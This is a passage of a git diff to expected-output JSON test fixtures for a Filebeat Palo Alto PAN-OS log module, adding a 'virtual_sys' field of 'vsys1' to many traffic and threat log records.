"panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -3244,6 +3276,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3341,6 +3374,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3438,6 +3472,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3538,6 +3573,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3638,6 +3674,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3735,6 +3772,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3832,6 +3870,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3927,6 +3966,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "8.8.8.8", @@ -4020,6 +4060,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -4118,6 +4159,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-security", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "50.19.102.116", @@ -4214,6 +4256,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.19", @@ -4314,6 +4357,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.24", @@ -4409,6 +4453,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "8.8.8.8", @@ -4505,6 +4550,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -4602,6 +4648,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4702,6 +4749,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -4799,6 +4847,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4896,6 +4945,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4993,6 +5043,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5090,6 +5141,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5187,6 +5239,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -5287,6 +5340,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -5387,6 +5441,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -5484,6 +5539,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5584,6 +5640,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -5681,6 +5738,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5778,6 +5836,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5878,6 +5937,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.31", @@ -5978,6 +6038,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -6075,6 +6136,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6172,6 +6234,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6269,6 +6332,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -6366,6 +6430,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6463,6 +6528,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6560,6 +6626,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6660,6 +6727,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -6757,6 +6825,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -6857,6 +6926,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -6954,6 +7024,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7051,6 +7122,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7151,6 +7223,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -7248,6 +7321,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "8.5.1.1", @@ -7345,6 +7419,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7442,6 +7517,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7542,6 +7618,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -7632,6 +7709,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -7732,6 +7810,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -7832,6 +7911,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -7922,6 +8002,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -8012,6 +8093,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -8112,6 +8194,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8209,6 +8292,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8306,6 +8390,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8406,6 +8491,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8503,6 +8589,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8593,6 +8680,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -8690,6 +8778,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8790,6 +8879,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8887,6 +8977,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8984,6 +9075,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -9081,6 +9173,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -9181,6 +9274,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9281,6 +9375,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9381,6 +9476,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9471,6 +9567,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -9571,6 +9668,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9671,6 +9769,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9771,6 +9870,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json index 0d9b9000a97..ef9975180c1 100644 --- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json @@ -74,6 +74,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -178,6 +179,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -282,6 +284,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -386,6 +389,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -490,6 +494,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -594,6 +599,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -698,6 +704,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -802,6 +809,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -906,6 +914,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1010,6 +1019,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1114,6 +1124,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1218,6 +1229,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1322,6 +1334,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1426,6 +1439,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1530,6 +1544,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1634,6 +1649,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1738,6 +1754,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1842,6 +1859,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1946,6 +1964,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2050,6 +2069,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2154,6 +2174,7 @@ "panw.panos.threat.resource": "b.scorecardresearch.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "b.scorecardresearch.com" @@ -2258,6 +2279,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2362,6 +2384,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2466,6 +2489,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2570,6 +2594,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2674,6 +2699,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2778,6 +2804,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2882,6 +2909,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2986,6 +3014,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3090,6 +3119,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3194,6 +3224,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3298,6 +3329,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3402,6 +3434,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3506,6 +3539,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3610,6 +3644,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3714,6 +3749,7 @@ "panw.panos.threat.resource": "cdn.taboola.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "cdn.taboola.com" @@ -3821,6 +3857,7 @@ "panw.panos.threat.resource": "rules.quantcount.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "rules.quantcount.com" @@ -3928,6 +3965,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4035,6 +4073,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4142,6 +4181,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4249,6 +4289,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4356,6 +4397,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4463,6 +4505,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4570,6 +4613,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4677,6 +4721,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4784,6 +4829,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4891,6 +4937,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4998,6 +5045,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -5105,6 +5153,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -5212,6 +5261,7 @@ "panw.panos.threat.resource": "www.googleadservices.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "www.googleadservices.com" @@ -5316,6 +5366,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5420,6 +5471,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5524,6 +5576,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5628,6 +5681,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5732,6 +5786,7 @@ 